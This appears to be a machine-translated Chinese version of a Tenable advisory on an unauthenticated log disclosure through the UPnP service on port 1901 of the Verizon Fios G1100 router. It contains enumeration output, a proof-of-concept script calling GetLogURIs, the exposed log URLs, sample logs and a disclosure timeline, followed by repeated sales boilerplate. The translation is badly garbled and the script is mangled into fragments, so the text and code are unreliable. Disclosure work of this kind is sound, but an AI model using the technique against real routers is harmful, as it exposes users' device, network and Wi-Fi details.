脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

VerizonFios量子网关G1100远程信息披露

中度

简表

测试NessusUPnP实施时发现Verizon信息披露漏洞fis量子网关G100.G1100有三个监听UPnP服务器一用户可禁用二用户不可本咨询与用户1901端口UPnP服务器相关无法禁止使用服务器优先引起我们的注意 因为它是API列表可见列表输出unpinfo.py

albinolobster@untu:~$pythonunp_info.py[+]发现UPnP位置[+]发现2位置:->http://192.168.1.1:1990/WFDADevice.xml->http://192.168.1.1:1901/root.xmlschemas-upnp-org设备类型:urn:schemas-upnp-org-> Model Name: FiOS-G1100  -> Model Number: FiOS-Gen4  -> Services:   => Service Type: urn:schemas-upnp-org:service:BasicManagement:2   => Control: /bms   => Events: /bmsEvent   => API: http://192.168.1.1:1901/xml/basic_management_service.xml    - Reboot    - BaselineReset    - GetDeviceStatus    - SetSequenceMode    - GetSequenceMode    - Ping    - GetPingResult    - NSLookup    - GetNSLookupResult    - Traceroute    - GetTracerouteResult    - GetBandwidthTestInfo    - BandwidthTest    - GetBandwidthTestResult    - InterfaceReset    - GetInterfaceResetResult    - GetTestIDs    - GetActiveTestIDs    - GetTestInfo    - CancelTest    - GetLogURIs    - SetLogInfo    - GetLogInfo    - GetACLData   => Service Type: urn:schemas-upnp-org:service:ConfigurationManagement:2   => Control: /cms   => Events: /cmsEvent   => API: http://192.168.1.1:1901/xml/configuration_management_service.xml    - GetSupportedDataModels    - GetSupportedParameters    - GetInstances    - GetValues    - GetSelectedValues    - SetValues    - GetAttributes    - GetConfigurationUpdate    - GetCurrentConfigurationVersion    - GetSupportedDataModelsUpdate    - GetSupportedParametersUpdate    - GetAttributeValuesUpdate    - GetAlarmsEnabled    - SetAlarmsEnabled    - GetACLData   => Service Type: urn:schemas-upnp-org:service:DeviceProtection:1   => Control: /dps   => Events: /dpsEvent   => API: http://192.168.1.1:1901/xml/device_protection_service.xml    - GetAssignedRoles    - GetRolesForAction    - GetACLData    - AddIdentityList    - RemoveIdentity

特别感兴趣的方法GetLoguris广告发布basic_management_service.xml.我们写作Get_log_uris.py来练习GetLogurisAPI

import xml.etree.EplementTree请求导入sysdefCreate_Payload
              ++
              
               ++
               
                ++
                
                 ++
                ++
               ++
              Lens.argv返回有效载荷
              
               sys.exitxixxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
              

执行中Get_log_uris.py长得像下方

albinolobster@ubuntu:~$ python get_log_uris.py http://192.168.1.1:1901/bms
              
              
               
                
                 
                  logs/dhcp_client,logs/system,logs/dhcp_server,logs/security,logs/firewall,logs/intrusion_detection,logs/parental_control,logs/upnp,logs/sdhl_alert,logs/sdhl_operation,logs/tr69,logs/firmware_update,logs/lpr
                 
                
               
              

服务器响应非认证请求并列URIs假设路由器使用地址192.168.1.1URIs地图定位如下:

  1. http://192.168.1.1:1901/logs/dhcp_client
  2. http://192.168.1.1:1901/logs/system
  3. http://192.168.1.1:1901/logs/dhcp_server
  4. http://192.168.1.1:1901/logs/security
  5. http://192.168.1.1:1901/logs/firewall
  6. http://192.168.1.1:1901/logs/intrusion_detection
  7. http://192.168.1.1:1901/logs/parental_control
  8. http://192.168.1.1:1901/logs/upnp
  9. http://192.168.1.1:1901/logs/sdhl_alert
  10. http://192.168.1.1:1901/logs/sdhl_operation
  11. http://192.168.1.1:1901/logs/tr69
  12. http://192.168.1.1:1901/logs/firmware_update
  13. http://192.168.1.1:1901/logs/lpr

发现时所有日志都可被远程非认证用户检索(局域网和广域网)。部分信息泄漏包括DHCP信息(设计名、mac地址、局域网IP地址)、无线信息(SSID连接客户端),以及由于防火墙工作方式,局域网设备可能与之通话的地址列表有一些日志样本请注意我确实清理了一些数据

2019年11月20日br-lan:19:282017本地3.info<158>dhpd:DHCPACKEQEST
Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,ssid,TENABLE_SSID Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,channel,11 Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,bssid,ca:fe:c0:ff:ee:00 Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,x_d4a928_connectionmode,B_G_N Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,associateddevice,[{x_d4a928_cur-snr=17, associateddevicemacaddress=ca:fe:c0:ff:ee:01, x_d4a928_packetstransmitted=5792358, x_d4a928_packetsreceived=1236, x_d4a928_transceiversetting=NA x 3 : 2, x_d4a928_curtxmodulationrate=117 Mbps, x_d4a928_standard=N, currssi=-62, x_d4a928_currxmodulationrate=130 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=144.4 Mbps, associateddeviceauthenticationstate=true}!{x_d4a928_cur-snr=20, associateddevicemacaddress=ca:fe:c0:ff:ee:02, x_d4a928_packetstransmitted=6474801, x_d4a928_packetsreceived=71558, x_d4a928_transceiversetting=NA x 3 : 2, x_d4a928_curtxmodulationrate=24 Mbps, x_d4a928_standard=N, currssi=-58, x_d4a928_currxmodulationrate=144.4 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=144.4 Mbps, associateddeviceauthenticationstate=true}!{x_d4a928_cur-snr=0, associateddevicemacaddress=ca:fe:c0:ff:ee:03, x_d4a928_packetstransmitted=5869243, x_d4a928_packetsreceived=44419, x_d4a928_transceiversetting=NA x 3 : 1, x_d4a928_curtxmodulationrate=39 Mbps, x_d4a928_standard=N, currssi=-77, x_d4a928_currxmodulationrate=43.3 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=72.2 Mbps, associateddeviceauthenticationstate=true}!{x_d4a928_cur-snr=7, associateddevicemacaddress=ca:fe:c0:ff:ee:04, x_d4a928_packetstransmitted=5792979, x_d4a928_packetsreceived=27111, x_d4a928_transceiversetting=NA x 3 : 1, x_d4a928_curtxmodulationrate=19.5 Mbps, x_d4a928_standard=N, currssi=-71, x_d4a928_currxmodulationrate=26 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=72.2 Mbps, associateddeviceauthenticationstate=true}]
15:37582017LETS=0x00PREC=4109DFP=443DPT=6443SE2226784CK=34899999WINDEW=1175ACKPSG=0MARK=0

Verizon设置信息披露方式禁止WAN访问路由器所有者无需采取任何行动升级,因为路由器自动更新自身可惜这些日志仍为本地网络上任何人访问

求解

保护WAN方面确保使用固件01.04.05.00局域网方面没有修复

披露时间线

2016-09-21-问题发现
2016-10-04-咨询起草
2016-10-04-报告问题 [email protected]cc [email protected]Verizon.com报告脆弱程度指南
2016-10-04-供应商自译自译
2016-10-05-供应商请求固件版
2016-10-05-可租发送信息
2016-11-24-Ping厂商更新
2017-01-04-Ping供应商更新
2017-01-09-供应商回复
2017-01-09-供应商回复2月固定,提供版本表示Tenable测试版本不正确固定或回归
2017-01-09-Server表示固件编译和修复可能有混淆,
2017-01-11-供应商表示1.04.05.00修复,但测试部署有限交GA后期一月
2017-02-27-Ping商查看软件是否按计划推广
2017-03-01-供应商检验展开状态
2017-03-30-可租确认固件01.04.00.10
2017-08-17-可租测试01.04.00.12

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID:TRA2017-35
信用度 :
Jacob Baines网络安全
sv2基础/时间分数
5.0/3.9
sv2向量:
AV:N/AC:L/Au:N/C:P/I:N/A:N
受影响产品 :
VerizonFios量子网关G1100
风险因子 :
中度
附加关键字 :
VECIRT-368459

咨询时间线

11-2017-[R1]初始发布
11-21-2017-[R2]固定标题

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin和可租WebApp扫描

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

百元资产类

选择订阅选项 :

立即购买

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin和可租WebApp扫描

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

百元资产类

选择订阅选项 :

立即购买

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin和可租WebApp扫描

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

百元资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描测试中也包括可租易用性管理器和可租鲁明

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理 和可点WebApp扫描

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map